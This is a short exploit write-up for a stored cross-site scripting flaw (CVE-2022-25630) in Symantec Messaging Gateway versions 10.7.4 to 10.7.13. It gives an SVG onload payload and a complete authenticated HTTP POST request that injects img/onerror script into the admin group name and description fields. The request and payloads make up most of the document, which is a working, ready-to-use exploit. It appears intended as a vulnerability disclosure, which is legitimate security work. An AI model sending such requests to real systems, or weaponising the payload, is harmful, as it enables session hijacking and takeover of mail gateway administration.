# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117
# Version: 10.7.4-10.7.13
# Tested on: [relevant os]
# CVE : CVE-2022-25630
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr


An authenticated user can embed malicious content with XSS into the admin
group policy page.

Example payload

*"/><svg/onload=prompt(document.domain)>*


POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo
HTTP/1.1
Host: X.X.X.X
Cookie: JSESSIONID=xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)
Gecko/20100101 Firefox/99.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 652
Origin: https://x.x.x.x
Referer:
https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000


Regards,

Omur UGUR